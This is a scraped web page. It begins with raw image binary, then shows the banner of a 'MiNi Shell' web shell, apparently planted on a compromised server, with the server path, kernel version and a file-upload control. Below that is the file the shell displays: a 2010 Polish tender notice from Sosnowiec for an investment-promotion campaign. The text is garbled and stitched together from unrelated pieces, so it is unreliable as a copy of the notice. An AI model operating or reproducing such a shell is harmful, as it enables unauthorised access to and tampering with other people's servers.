JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100804/208665-N-2010.html

<p class="kh_header"><b>Sosnowiec: Świadczenie usług w zakresie przygotowania <br>
i przeprowadzenia kampanii promocyjnej pn. Zainwestuj w Sosnowcu - część 1, w ramach projektu Sosnowiec -miasto dobrych inwestycji rok 2010</b><br>
<b>Numer ogłoszenia: 208665 - 2010; data zamieszczenia: 04.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 32 2960600, faks 32 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie przygotowania <br>
i przeprowadzenia kampanii promocyjnej pn. Zainwestuj w Sosnowcu - część 1, w ramach projektu Sosnowiec -miasto dobrych inwestycji rok 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usług w zakresie  
przygotowania i przeprowadzenia kampanii promocyjnej pn. 
Zainwestuj w Sosnowcu - część 1, w ramach projektu Sosnowiec - Miasto dobrych inwestycji obejmujących w szczególności: <br>
1.1.Przeprowadzenie analizy wyboru kanałów promocji: <br>
1.1.1.Wykonawca zidentyfikuje i sporządzi wykaz docelowych grup odbiorców treści przekazywanych w ramach kampanii promocyjnej; <br>
1.1.2.Wykonawca opracuje merytorycznie i zredaguje informacje do <br>
katalogów tematycznych uwzględniając niżej wymienione branże gospodarcze i rodzaje firm, do których będą adresowane nowe oferty inwestycyjne, 
takie jak: <br>
-usługi (w szczególności: branża hotelowa, gastronomiczna , sportowo - rekreacyjna, elektroniczna, informatyczna) <br>
-produkcja (specjalistyczne i innowacyjne firmy z sektora małych średnich przedsiębiorstw - wszystkich branż );  <br>
1.1.3.Wykonawca wskaże dla każdej z wymienionych grup docelowych najbardziej efektywne kanały komunikacji wraz z uzasadnieniem wyboru, w oparciu o następujące formy promocji: <br>
-reklama w gazecie, <br>
-artykuł w czasopiśmie specjalistycznym, <br>
-reklama na billboardzie, <br>
-reklama w TV (spot reklamowy), <br>
-reklama/informacja na stronie internetowej Zamawiającego; <br>
1.1.4.Wykonawca przedstawi rekomendację (zawierającą uzasadnienie), konkretnych mediów (takich jak: podanie tytułów prasowych gazet branżowych, dodatków tematycznych, czasopism specjalistycznych, programów telewizyjnych regionalnych i ogólnopolskich), w których powinny zostać zaprezentowane poszczególne treści/ elementy kampanii z uwzględnieniem następujących parametrów przekazu: <br>
-5 odcinków trzydziestosekundowych spotów reklamowych (1 odcinek promujący projekt i 4 odcinki związane z kon-kretnymi branżami gospodarczymi), <br>
-3 ogłoszenia reklamowe w gazetach (różne tytuły) w formacie co najmniej cztero modułowym <br>
-5 artykułów sponsorowanych w czasopismach specjalistycznych (różne tytuły) w formacie co najmniej sześcio modułowym  <br>
-2 ekspozycje reklamy typu billboard (powierzchnia: 18 m2, czas ekspozycji: co najmniej 1 miesiąc, lokalizacja:  przy drodze krajowej nr 86 - trasa z Katowic do Warszawy); <br>
1.1.5.Wykonawca opracuje Raport dla Gminy Sosnowiec (dalej: Raport), w którym zostaną zawarte informacje opisane w punktach od 1.1.1. do 1.1.4. oraz podsumowanie z przeprowadzonej analizy w postaci wniosków wraz <br>
z harmonogramem działań promocyjnych;  <br>
1.1.6.Raport opisany w punkcie 1.1.5. musi zawierać oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie:<br> http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/), <br>
1.1.7.Raport opisany w punkcie 1.1.5. musi zawierać zestaw znaków i logotypów zgodnych z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów<br>
w zakresie informacji i promocji, dostępnych na stronie: <br>
http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf <br>
1.1.8.Analizę wyboru kanałów promocji, o której mowa w punktach od 1.1.1 do 1.1.5 - wykonawca zobowiązany będzie przekazać zamawiającemu w formie elektronicznej na adres: wrf.rozwoj@um.sosnowiec.pl, w terminie 14 dni licząc od daty podpisania umowy. W przypadku zgłoszenia w terminie 2 dni przez zamawiającego uwag do dostarczonej propozycji, wykonawca zobowiązany będzie je uwzględnić w terminie dwóch dni i ponownie przekazać zamawiającemu do akceptacji. Zaakceptowaną analizę wyboru kanałów promocji, o której mowa w punktach od 1.1.1 do 1.1.5 - wykonawca dostarczy zamawiającemu w formie papierowej za pośrednictwem Poczty Polskiej. Przyjęcie dokumentu potwierdzone będzie protokołem odbioru. <br>
1.2.Opracowanie nowych ofert inwestycyjnych <br>
1.2.1.Wykonawca przygotuje w wersji elektronicznej i papierowej dziesięć nowych kart ofert inwestycyjnych zawierających dane o terenach/nieruchomościach inwestycyjnych gminy Sosnowiec, w oparciu o treści merytoryczne/opisy, zdjęcia, wizualizacje oraz mapy lokalizacyjne dostarczone przez zamawiającego. <br>
1.2.2.Opracowane karty ofert inwestycyjnych muszą zawierać oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie:<br> http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/), <br>
1.2.3.Opracowane karty ofert inwestycyjnych muszą zawierać zestaw znaków i logotypów zgodnych z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów w zakresie informacji i promocji, dostępnych na stronie:<br> 
http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf <br>
1.2.4.Wykonawca przetłumaczy treści dziesięciu nowych kart ofert inwestycyjnych (treść jednej karty to około 200 wyrazów) na cztery języki obce: angielski, hiszpański, francuski i chiński; <br>
1.2.5.Wykonawca przygotuje i dostarczy zamawiającemu graficzne matryce do druku dziesięciu nowych kart ofert inwestycyjnych, w 5 wersjach językowych (polskiej, angielskiej, hiszpańskiej, francuskiej, chińskiej);<br>
1.2.6.Wykonawca wydrukuje i dostarczy zamawiającemu po 200 sztuk nowych kart ofert inwestycyjnych<br>
w każdej z pięciu wersji językowych - o parametrach opisanych poniżej: <br>
-format A4:- 210 mm x297 mm; <br>
-kolor: CMYK 4+0 (nadruk z jednej strony);<br>
-papier: kreda matt 170 g.<br>
1.2.7.Opracowane w wersji elektronicznej propozycje dziesięciu nowych kart ofert inwestycyjnych w języku polskim - wykonawca przekaże do akceptacji zamawiającemu na adres: wrf.rozwoj@um.sosnowiec.pl w terminie 14 dni licząc od daty dostarczenia przez zamawiającego treści merytorycznej/opisu ,zdjęć, wizualizacji oraz map lokalizacyjnych/. <br>
W przypadku zgłoszenia w terminie do dwóch dni przez zamawiającego uwag do propozycji dziesięciu nowych kart ofert inwestycyjnych w języku polskim, wykonawca uwzględni je w terminie czterech dni i ponownie przekaże zamawiającemu do akceptacji. Po otrzymaniu od zamawiającego pisemnej akceptacji, wykonawca przetłumaczy, przygotuje i wykona druk nowych kart ofert inwestycyjnych zgodnie z wymaganiami opisanymi w punktach od 1.2.4 do 1.2.6., w terminie 20 dni licząc od daty otrzymania akceptacji propozycji przez<br>
zamawiającego. <br>
1.3.Aktualizacja publikacji pod tytułem: Oferta miasta Sosnowca dla inwestorów 
 (dalej: Oferta) oraz Mapy Inwestycyjnej (dalej: Mapa) <br> 
1.3.1.Wykonawca wykona aktualizację informacji i danych zawartych w Ofercie , przygotuje plik Oferty do druku odpowiadający podstawowym wymaganiom technicznym stawianym przez drukarnie i wymaganiom zapisanym poniżej w punktach 1.3.5 i 1.3.6 oraz jeden egzemplarz jej wersji papierowej. <br>
1.3.2.Zaktualizowane informacje i dane zawarte w Ofercie wykonawca dostarczy zamawiającemu w postaci elektronicznego zapisu pliku poglądowego w formacie JPG będącego plikiem z podglądem zaktualizowanej Oferty po wydruku, w celu weryfikacji. <br>
1.3.3.Wykonawca zaktualizuje obie strony Mapy poprzez uwzględnienie w niej nowych terenów i obiektów inwestycyjnych, ujętych w dziesięciu nowych kartach ofert inwestycyjnych, o których mowa w punkcie 1.2.1., przygotuje plik Mapy do druku odpowiadający podstawowym wymaganiom technicznym stawianym przez drukarnie wielkoformatowe i wymaganiom zapisanym poniżej w punktach 1.3.5 i 1.3.6 oraz jeden egzemplarz Mapy w wersji papierowej. <br>
1.3.4.Zaktualizowaną wersję Mapy wykonawca dostarczy zamawiającemu w postaci elektronicznego zapisu pliku poglądowego w formacie JPG będącego plikiem z podglądem zaktualizowanej Mapy po wydruku, w celu weryfikacji. <br>
1.3.5.Aktualizacje Oferty i Mapy muszą zawierać oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej<br>
w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie: <br>
http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/, <br>
1.3.6.Aktualizacje Oferty i Mapy muszą zawierać zestaw znaków i logotypów zgodnych z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów<br>
w zakresie informacji i promocji, dostępnych na stronie: <br>
http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf <br>
1.3.7.Propozycje zaktualizowanych wersji Oferty oraz Mapy wykonawca dostarczy w wersji elektronicznej do akceptacji zamawiającmu na adres e- mailowy. <br> wrf.rozwoj@um.sosnowiec.pl w terminie do 20 dni od daty dostarczenia zamawiającemu wydrukowanych nowych kart ofert inwestycyjnych, o których mowa w punkcie 1.2.7. W przypadku zgłoszenia przez zamawiającego w terminie trzech dni uwag do przesłanych propozycji, wykonawca zobowiązany będzie je uwzględnić w terminie siedmiu dni i ponownie przekazać zamawiającemu do akceptacji. Po otrzymaniu akceptacji zamawiającego, wykonawca dostarczy w terminie siedmiu dni zaktualizowaną Ofertę i Mapę w formie opisanej<br>
w powyższych punktach od 1.3.1 do 1.3.6. Prawidłowe wykonanie usługi potwierdzone zostanie pisemnym protokołem odbioru. <br>
1.4.Nakręcenie spotów reklamowych (krótkich filmów reklamowych) <br>
1.4.1.Wykonawca wyprodukuje pięć 30-sekundowych spotów reklamowych, w tym:
a)Jeden spot o treści promującej sam projekt pod nazwą:Sosnowiec - miasto dobrych inwestycji i informujący o źródle dofinansowania projektu, <br> 
b)Cztery spoty o treści zachęcającej do inwestowania w Sosnowcu, <br>
1.4.2.Wykonawca nakręci pięć spotów reklamowych na podstawie scenariuszy przygotowywanych wspólnie<br>
z zamawiającym przy wykorzystaniu zdjęć, wizualizacji, informacji oraz innych materiałów dostarczonych przez zamawiającego, zgodnie z wytycznymi, o których mowa w punktach: 1.4.5 i 1.4.6., w następujących czterech wariantach: <br>
a) w wersji dźwiękowej w języku polskim, <br>
b) w wersji dźwiękowej w języku angielskim, <br>
c) w wersji z napisami w języku polskim (bez dźwięku), <br>
d) w wersji z napisami w języku angielskim (bez dźwięku). <br>
1.4.3.Wykonawca nagra spoty o jakości i w formacie zapewniającym możliwość emisji:<br> 
1) w telewizji; <br>
2) w Internecie; <br>
3) na ekranie prezentacyjnym podczas targów i podczas  
innych publicznych prezentacji; <br>
1.4.4.Wykonawca zapewni pełny zakres usług produkcyjnych: montaż, oprawę graficzną, podkład dźwiękowy, usługi lektora. <br>
1.4.5.Spoty muszą zawierać oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej w Księdze Identyfikacji Wizualnej marki Sosnowiec <br> 
dostępnej na stronie: <br>
http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/, <br> 
1.4.6.Spoty muszą zawierać zestaw znaków i logotypów zgodnych z Wytycznym Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów w zakresie informacji i promocji, 
dostępnymi na stronie: <br>
http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf <br>
1.4.7.Propozycje pięciu spotów wykonawca przekaże w wersji elektronicznej (na adres wrf.rozwoj@um.sosnowiec.pl) w ciągu 14 dni od daty dostarczenia przez zamawiającego zdjęć, wizualizacji, informacji oraz innych materiałów niezbędnych do opracowania scenariuszy spotów. W przypadku zgłoszenia przez zamawiającego w terminie do trzech dni uwag do propozycji, wykonawca uwzględni je w terminie 7 dni i ponownie przekaże zamawiającemu do akceptacji. Przyjęcie pięciu spotów przez zamawiającego potwierdzone będzie protokołem odbioru po uprzednim zaakceptowaniu przedstawionej wersji propozycji spotów reklamowych. <br>
1.5.Umieszczenie spotów reklamowych w Porcie Lotniczym Katowice Pyrzowice.<br>
1.5.1.Wykonawca wykupi powierzchnie reklamowe na terenie terminali pasażerskich A i B Międzynarodowego Portu Lotniczego Katowice Pyrzowice dla emisji pięciu 30-sekundowych spotów reklamowych (120 emisji dziennie) na 50 ekranach plazmowych przez okres co najmniej dwóch miesięcy. <br>
1.6.Zaprojektowanie i umieszczenie reklamy na billboardach przy drodze krajowej nr 86 (trasa z Katowic do Warszawy). <br>
1.6.1.Wykonawca sporządzi projekt graficzny reklamy zawierający hasło reklamowe o treści: Zainwestuj<br>
w Sosnowcu; <br>
1.6.2.Reklama musi zawierać oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej
na stronie: <br>
http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/, <br>
1.6.3.Reklama musi zawierać zestaw znaków i logotypów zgodnych z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów w zakresie informacji i promocji, dostępnymi na stronie: <br>
http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf <br>
1.6.4.Wykonawca wykona ekspozycję reklamy na nośniku typu billboard w sposób zapewniający: <br>
a) format - 18,00 m2 <br>
b) liczbę nośników - co najmniej dwa <br>
c) czas ekspozycji - co najmniej 1 miesiąc <br>
d) lokalizacja - przy drodze krajowej nr 86 (trasa z Katowic do Warszawy). <br>
1.6.5.W terminie ustalonym w harmonogramie, o którym mowa w punkcie 1.1.5. wykonawca przedstawi do uzgodnienia zamawiającemu w wersji elektronicznej na adres: <br> wrf.rozwoj@um.sosnowiec.pl <br>
3 propozycje reklamy do ekspozycji na billbordzie oraz 4 propozycje jej lokalizacji przy drodze krajowej nr 86. Zamawiający zobowiązany będzie dokonać wyboru jednego spośród trzech propozycji reklamy oraz dwóch lokalizacji z czterech zaproponowanych w terminie 2 dni licząc od daty dostarczenia przez wykonawcę propozycji. W przypadku zgłoszenia przez zamawiającego uwag do dostarczonych propozycji reklamy oraz jej lokalizacji, wykonawca uwzględni je w terminie dwóch dni i ponownie przekaże zamawiającemu do akceptacji. Zamawiający dokona ostatecznego wyboru propozycji reklamy i jej dwóch lokalizacji przy drodze krajowej nr 86, w terminie dwóch dni licząc od daty dostarczenia przez wykonawcę zweryfikowanej propozycji. Akceptację zamawiający przekaże wykonawcy w formie elektronicznej na wskazany przez wykonawcę adres - email. Wykonawca zapewni ekspozycję reklamy na billboardzie w terminie od 20 października 2010 r. <br>
1.6.6.Wykonawca gwarantuje zachowanie bardzo dobrej jakości reklamy w czasie trwania ekspozycji, poprzez: <br>
a) dokonywanie bieżącej kontroli jakości wyklejonych billboardów, <br>
b) w razie stwierdzenia uszkodzenia plakatów - nieodpłatne ponowne wyklejenie.<br>
Wymiany uszkodzonych plakatów wykonawca dokona w terminie 48 godzin licząc od czasu stwierdzenia takiej konieczności przez zamawiającego lub przez wykonawcę. <br>
1.6.7.Wykonawca usunie reklamy z dwóch billboardów w ciągu 24 godzin po zakończeniu czasu ich ekspozycji. <br>
1.6.8.Podstawą uznania należytego wykonania usługi zgodnie z wymaganiami zapisanymi w punktach od 1.6.1 do 1.6.7 będzie pisemny protokół odbioru sporządzony przez zamawiającego. <br>
1.7.Wykonawca dostarczy do zamawiającego niżej wymienione materiały promocyjne: (długopisy, smycze, teczki skóropodobne i papierowe, torby papierowe, katalogi tematyczne, ). <br>
1.7.1.Długopisy - 200,00 szt.; <br>
1.7.2.Długopisy muszą posiadać oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie: <br>
http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/); <br>
1.7.3.Długopisy muszą posiadać nadruk zestawu znaków i logotypów zgodnych z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów w zakresie informacji i promocji, dostępnymi na stronie: <br>
 http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf.
1.7.4.Smycze - 2.000,00 szt.; <br>
1.7.5.Smycze muszą posiadać oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej w Księdze Identyfikacji Wizalnej marki Sosnowiec dostępnej na stronie: <br>
http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/); <br>
1.7.6.Smycze muszą posiadać nadruk zestawu znaków i logotypów zgodnych z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów w zakresie informacji i promocji, dostępnymi na stronie: <br>
http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf.
1.7.7.Teczki skóropodobne w formacie A4 - 200,00 szt.; <br>
1.7.8.Teczki skóropodobne muszą posiadać oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej<br>
w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie: <br>
http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/); <br>
1.7.9.Teczki skóropodobne muszą posiadać nadruk zestawu znaków i logotypów zgodnych z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów<br> 
w zakresie informacji i promocji, dostępnymi na stronie: <br>
http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf. <br>
1.7.10.Teczki papierowe w formacie A4 - 6.000,00 sztuk; <br>
1.7.11.Teczki papierowe muszą posiadać oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie: <br>
http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/);<br> 
1.7.12.Teczki papierowe muszą posiadać nadruk zestawu znaków i logotypów zgodnych z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów <br>
w zakresie informacji i promocji, dostępnymi na stronie: <br>
http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf. <br>
1.7.13.Torby papierowe (średniej wielkości) - 6.000,00 sztuk; <br>
1.7.14.Torby papierowe muszą posiadać oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie: <br>
http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/;<br> 
1.7.15.Torby papierowe muszą posiadać nadruk zestawu znaków i logotypów zgodnych z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów <br>
w zakresie informacji i promocji, dostępnymi na stronie: <br>
http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf. <br>
1.7.16.Katalogi tematyczne - 1.000,00 szt.; <br>
1.7.17.Opracowanie graficzne katalogów tematycznych wykonawca sporządzi przy wykorzystaniu zdjęć/map dostarczonych przez zamawiającego; <br>
1.7.18.Treść katalogów tematycznych będzie zawierać informacje zgodne z wymaganiami zapisanymi w punkcie 1.1.2.; <br>
1.7.19.Katalogi tematyczne muszą być tak wykonane by spełniały następujące wymagania: <br>
a) druk: pełen kolor 4/4; gramatura 80 g/m2 <br>
b) papier: kreda matt, okładka twarda, kolorowa 4/0, gramatura minimum 170  g/m2; <br>
1.7.20.Wykonawca odpowiada za: <br>
a) projekt układu katalogu tematycznego,  <br>
b) opracowanie układu graficznego i treści merytorycznej katalogu tematycznego (zgodnie z wymaganiami zapisanymi w punkcie 1.1.2),<br> 
c) obróbkę fotografii/map dostarczonych przez zamawiającego; <br>
d) opracowanie składu i łamanie tekstów na kolumnach, <br>
e) techniczne przygotowanie katalogu tematycznego do druku, <br>
f) druk i oprawę katalogu tematycznego, <br>
g) zapisanie przygotowanego do druku katalogu tematycznego w formacie
pdf i doc<br>
1.7.21.Katalogi tematyczne muszą zawierać oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej<br> 
w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie:<br>
http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/; <br>
1.7.22.Katalogi tematyczne muszą zawierać zestaw znaków i logotypów zgodnych z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów <br>
w zakresie informacji i promocji, dostępnymi na stronie:<br>
http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf. <br>
1.7.23.Propozycje materiałów promocyjnych wymienionych w punktach od 1.7.1 do 1.7.21., wykonawca przedstawi w wersji elektronicznej (na adres : wrf.rozwoj@um.sosnowiec.pl) w ciągu 20 dni od daty podpisania umowy, do akceptacji zamawiającemu. W przypadku zgłoszenia przez zamawiającego w terminie do dwóch dni uwag do propozycji, wykonawca zobowiązany będzie je uwzględnić w terminie dwóch dni i ponownie przekazać zamawiającemu do akceptacji. Po dokonaniu akceptacji przez zamawiającego przedstawionej propozycji materiałów promocyjnych, wykonawca dostarczy materiały promocyjne opisane w punktach od 1.7.1. do 1.7.22. na własny koszt, własnym środkiem transportu i na własne ryzyko do siedziby zamawiającego w terminie do 29 października 2010 r. Wykonanie dostawy z należytą starannością potwierdzone zostanie pisemnym protokołem odbioru. <br>
1.8.Wykonawca zamieści reklamy w gazetach oraz artykuły sponsorowane<br>
w czasopismach. <br> 
1.8.1.Wykonawca zredaguje treść ogłoszeń/reklam, wykona obróbkę graficzną uwzględniając w zawartości merytorycznej informacje z dostarczonych przez zamawiającego materiałów oraz zdjęć/map, w celu ich publikacji<br>
w gazetach,<br>
1.8.2.Wykonawca wykupi powierzchnie reklamowe w gazetach branżowych i w dodatkach specjalistycznych zgodnie <br>
z wymaganiami<br> 
opisanymi w punkcie 1.1.4,<br>
